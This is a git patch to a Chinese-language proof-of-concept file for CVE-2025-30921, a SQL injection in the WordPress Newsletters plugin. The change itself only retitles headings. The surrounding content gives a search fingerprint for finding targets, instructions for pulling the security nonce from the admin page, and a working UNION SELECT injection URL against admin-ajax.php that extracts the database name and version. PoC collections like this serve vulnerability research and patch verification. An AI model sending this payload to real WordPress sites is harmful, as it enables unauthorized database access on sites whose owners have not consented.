From ab967c7b6b34a4250bd68e59f8f0afcd8d2f178d Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 7 Apr 2025 11:32:41 +0800
Subject: [PATCH] =?UTF-8?q?Update=20WordPress=20Newsletters=20Plugin?= =?UTF-8?q?=E5=AD=98=E5=9C=A8SQL=E6=BC=8F=E6=B4=9E(CVE-2025-30921).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/wpoc/WordPress/WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md b/wpoc/WordPress/WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md
index 09b3b89..340ba0c 100644
--- a/wpoc/WordPress/WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md
+++ b/wpoc/WordPress/WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md
@@ -8,13 +8,14 @@ WordPress在Newsletters插件版本4.9.9.7或更低版本的插件仪表板中
 body="/wp-content/plugins/web-directory-free"
 ```
-## poc-(需要Administrator权限)
+## 前提条件和Administrator权限
 使用浏览器开发者工具,action=wpmlwelcomestats&security=在“元素”选项卡中搜索 并检查 的值security。例如,如果搜索结果如下所示,请记下22b1ac0de6
 ```
 jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
 ```
 ![image](https://github.com/user-attachments/assets/c82f3e9a-fd70-405f-b6d0-d9bd77622f76)
+## poc
 ```javascript
 http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
 ```